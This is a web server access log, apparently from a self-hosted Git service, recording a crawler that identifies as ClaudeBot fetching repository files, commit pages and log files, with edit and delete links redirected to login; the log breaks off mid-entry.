"/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom3.png" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.3" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21834] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11091] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom3.png" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11098] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Ffallback_stream_access.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.2" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-1_error.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11324] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21824] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6?display=source" [Client 216.73.216.188] [Length 36076] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" [Client 216.73.216.188] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7?display=source" [Client 216.73.216.188] [Length 11191] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11712] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4?display=source" [Client 216.73.216.188] [Length 23976] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14846] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15579] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css/style.css" [Client 216.73.216.188] [Length 12665] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.4" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.7" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.7" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.6" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.6" -[15/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.4" -[15/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16506] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14233] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13098] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 216.73.216.188] [Length 11204] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 216.73.216.188] [Length 11160] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 216.73.216.188] 